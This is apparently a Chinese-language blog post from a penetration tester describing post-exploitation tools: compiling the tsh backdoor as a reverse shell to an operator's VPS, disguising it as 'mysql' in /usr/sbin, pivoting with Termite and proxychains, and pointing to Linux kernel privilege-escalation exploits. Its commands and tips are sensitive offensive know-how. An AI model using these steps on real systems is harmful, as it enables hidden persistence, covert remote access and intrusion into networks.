whip1ash

后渗透的数个工具使用与坑点(tsh termite cobaltstrike 常见提权)

2018-10-30

后渗透的数个工具使用与坑点(tsh termite cobaltstrike 常见提权)

Intro

在某个项目中,getshell后发现了大规模内网,突然发现已经非常久没有见过正儿八经的内网了(我知道是我菜)…….好多企业现在把业务的内网放在云上,组成云内网(工作经验的感觉是这样的,不知道实际情况如何)。这次getshell发现内网后却发现:鸡儿,老子不会内网渗透了,遂重新学之。

tsh - https://github.com/orangetw/tsh

tsh是orange写的后门.
github上的readme与实际有点不一样。
需要编译,默认是反向shell的模式。
./complie.sh os[操作系统类型] bc_host[反向shell连接的ip] bc_port[通信端口] [密码] [延迟时间]

使用Mac 10.13.6 xcode自带的gcc编译报错。

注释掉tshd.c的23行,在osx下可以正常编译。

我在实际用的时候是直接在linux下编译的。经过实战,tsh还是非常稳的,使用tsh的文件传输下载一个6G多的大文件,可以正常下载,丢包不是非常厉害,可以解压出来大部分文件。

在跳板机上使用wget将tshd文件下载下来,赋予执行权限,更名为mysql,放到/usr/sbin/的目录下,后台运行!

在vps上只需要执行tsh -cb,等待反向shell的链接就行了。这次遇到了一个比较坑的问题,客户的服务器的sshd设置的超时时间特别短,大概在60s?60s不操作的话就自动logout了。很蛋疼,如果要改的话需要重启sshd,因为是线上环境,没敢改。(大佬说只需要导出一个变量就好了export TMOUT=0)

上传跟下载文件,如下所示,在反向shell中只需要吧换成cb就行了。

1
./tsh <hostname> get <要下载的文件> <本地路径>
./tsh <hostname> put <要上传的文件> <远程路劲>

termite - http://rootkiter.com/Termite/

termite是EarthWorm作者的开发的另一款边界穿透工具,朋友推荐给我的,功能还是很强大的,但是当时因为没有解决shell的auto logout的问题,所以经常不知道是不是掉线了,需要重启admin程序才知道,所以还是有一点蛋疼的。

可以看到作者提供了非常多的版本的工具,其实我们最常用的也就是Linux,windows还有macOS的。

首先我们需要一个管理所有节点的agent,一般这个agent是自己的vps,运行./agent_linux_x86_64 -l 12312 &,监听12312端口。一直放到后台跑就行了。

在本机上使用admin端连接我们的vps。./admin -c vps的ip -p vps监听的端口

可以看到我们已经连接上管理机了。

当用户注销(logout)或者网络断开时,终端会收到 HUP(hangup)信号从而关闭其所有子进程。
所以我们需要一种靠谱的方式,让我们的进程不受shell的退出或者网络的因素所影响。参考这篇文章 https://www.ibm.com/developerworks/cn/linux/l-cn-nohup/index.html

将网络边界的机器加入到节点管理中。

当前的所有agent。

其实在实际渗透内网的时候,我们最需要就是能够我们的流量给转发到内网中,termite可以很方便的开启一个socks端口,并且转发到我们本机。只需要在节点2上,执行socks 端口,就可以了,简直不要太方便。

使用proxychain进行流量转发。更改proxychain的配置。

然后使用proxychain转发流量就行了。

proxychain在Mac下需要关闭sip,要不无法代理。

Termite这个工具看起来非常的方便,但是在实际使用中,感觉并不是那么尽如人意。最重要的是,不稳,非常的不稳。admin跟管理机的连接还没有什么问题,主要是管理机跟剩下几个节点的连接,常常有断开的情况,并且,admin这边并没有察觉,只有执行一个shell命令,看看能不能弹回来,才能发现时哪个机器掉线了。(这个有可能跟网络环境有关系,毕竟实际网络环境相当复杂。)

这个网上资料挺多的,我这里就不赘述了,主要就是找到上面的这个资源还挺全的。

这个工具啥都好,图形界面,能与msf连接,就是不支持linux的shell,如果有大哥知道如何监听linux的shell,小弟感激不尽~

常见提权

超全linux提权
https://github.com/SecWiki/linux-kernel-exploits

但是有的时候还不如直接Google如下字符串 2.6.32-xxx exploit

扫描二维码,分享此文章